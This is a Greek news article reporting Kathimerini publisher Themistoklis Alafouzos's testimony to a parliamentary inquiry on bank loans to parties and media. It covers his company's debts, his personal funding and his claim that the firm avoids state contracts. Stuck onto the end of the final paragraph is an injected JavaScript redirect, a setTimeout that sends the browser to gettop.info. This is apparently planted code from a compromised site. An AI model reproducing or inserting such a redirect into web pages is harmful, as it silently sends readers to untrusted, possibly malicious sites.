Θ. Αλαφούζος: Επειδή είμαστε στην ενημέρωση δεν παίρνουμε δουλειές από το Δημόσιο

0
6

 

Στην Εξεταστική Επιτροπή για τα δάνεια των τραπεζών σε κόμαμτα και ΜΜΕ εμφανίστηκε ο εκδότης της «Καθημερινής» Θεμιστοκλής Αλαφούζος, όπου ανέφερε πως «το σύνολο του δανεισμού είναι περίπου 99 εκατ. ευρώ». Όπως διευκρίνισε τα 45 εκατ. είναι για την «Καθημερινή ΑΕ» και τα 47 είναι δανεισμός από τράπεζα του εξωτερικού (σε δολάρια) και αφορά την θυγατρική της «Καθημερινής», «Αργοναύτης».

Ο κ. Αλαφούζος πρόσθεσε ότι έχει λάβει ένα κοινοπρακτικό δάνειο ύψους 36 εκατ. ευρώ για την αναχρηματοδότηση δανεισμού, το οποίο βαίνει μειούμενο και ότι ο ίδιος έχει βάλει περίπου 21 εκατ. ευρώ από προσωπική του περιουσία.

Επιπροσθέτως, χαρακτήρισε υγιή την εταιρεία λέγοντας πως δεν έχει αφήσει απλήρωτο ΙΚΑ, ασφαλιστικές ή φορολογικές εισφορές και πως πληρώνει ανελλιπώς το προσωπικό κάθε 20 του μήνα.

«Αποφεύγουμε τις προσφορές που δεν είναι συναφείς με το αντικείμενο μας» είπε και ανέφερε ότι «ακριβώς επειδή είμαστε στον χώρο της ενημέρωσης αποφεύγουμε να παίρνουμε δουλειές από το δημόσιο» τονίζοντας πως τα τελευταία 2 χρόνια σαν εταιρεία δεν αισθάνεται την κρίση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here